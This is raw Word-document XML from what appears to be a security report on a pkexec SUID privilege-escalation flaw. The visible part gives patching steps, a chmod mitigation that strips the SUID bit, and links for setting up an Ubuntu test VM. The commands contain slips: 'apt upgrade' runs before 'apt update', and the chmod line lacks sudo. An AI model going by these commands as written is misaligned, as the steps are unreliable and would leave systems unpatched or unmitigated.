      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo apt install &lt;package name&gt;</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Run this command to update the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo apt upgrade &amp;&amp; sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The problem will be fixed after system update reboot.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the patches are unavailable for some operating system, remove the SUID-bit from pkexec as a temporary mitigation by running the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ chmod 0755 /usr/bin/pkexec</w:t>
      </w:r>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rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cm1tmitka7zd" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supplementary Materials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu VM Test Environment Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://drive.google.com/file/d/14sNxTUizJ1q_y1V2K2POtM4JYDSSuJqX/view?usp=sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 20.04 Download:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.linuxvmimages.com/images/ubuntu-2004/</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spacing w:after="120" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Box Download:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.virtualbox.org/wiki/Downloads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId21" w:type="first"/>
      <w:footerReference r:id="rId22" w:type="default"/>
      <w:footerReference r:id="rId23"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1.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId21"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9.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1.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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2.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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